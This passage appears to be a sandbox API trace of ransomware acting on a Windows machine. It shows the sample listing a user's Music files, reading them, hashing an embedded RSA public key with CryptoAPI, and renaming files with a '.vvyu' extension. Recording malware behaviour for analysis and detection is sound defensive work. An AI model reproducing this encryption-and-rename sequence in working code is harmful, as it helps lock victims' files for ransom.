cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.674] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.675] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.675] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.675] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.675] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.675] CloseHandle (hObject=0x568) returned 1 [0194.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0194.676] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.677] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0194.677] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\nmf9EMIHkrld8q1qS.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\nmf9emihkrld8q1qs.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\nmf9EMIHkrld8q1qS.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\nmf9emihkrld8q1qs.mp3.vvyu")) returned 1 [0194.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.678] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.678] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.681] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.681] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd85f7380, ftCreationTime.dwHighDateTime=0x1d8a11c, ftLastAccessTime.dwLowDateTime=0x58f4f280, ftLastAccessTime.dwHighDateTime=0x1d8a5d3, ftLastWriteTime.dwLowDateTime=0x58f4f280, ftLastWriteTime.dwHighDateTime=0x1d8a5d3, nFileSizeHigh=0x0, nFileSizeLow=0x1cd0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OlZ6-jXMW7o1_h PvU.mp3", cAlternateFileName="OLZ6-J~1.MP3")) returned 1 [0194.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1068 [0194.681] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.682] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea1068 | out: hHeap=0x620000) returned 1 [0194.682] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\OlZ6-jXMW7o1_h PvU.mp3") returned=".mp3" [0194.682] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\OlZ6-jXMW7o1_h PvU.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\olz6-jxmw7o1_h pvu.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.682] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=7376) returned 1 [0194.682] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.685] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x1caa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.685] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.687] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.687] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.687] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.687] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x1cd0, lpOverlapped=0x0) returned 1 [0194.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.688] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0194.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.688] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.688] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.689] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.690] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.690] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.690] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.690] GetLastError () returned 0x0 [0194.690] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.690] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.690] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.690] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.690] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.690] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.690] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1cd0) returned 0x2ea3a68 [0194.691] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.691] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea1068 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea10b0 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.691] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ba0 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.692] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea5740 [0194.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.692] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5740 | out: hHeap=0x620000) returned 1 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ac0 [0194.692] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2b88 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.693] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.693] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.694] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.694] GetCurrentThreadId () returned 0x66c [0194.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea0100 [0194.694] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.695] GetCurrentThreadId () returned 0x66c [0194.695] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.695] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.696] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.696] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2be8 [0194.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0194.697] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c00 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bd0 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2bb8 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2c18 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bd0 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.698] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.698] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b88 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea5740 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2be8 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c18 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea5950 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.699] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea5b68 [0194.699] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.700] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.700] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5950 | out: hHeap=0x620000) returned 1 [0194.701] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5b68 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2c00 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.702] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea10b0 | out: hHeap=0x620000) returned 1 [0194.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea5740 | out: hHeap=0x620000) returned 1 [0194.703] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.704] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: 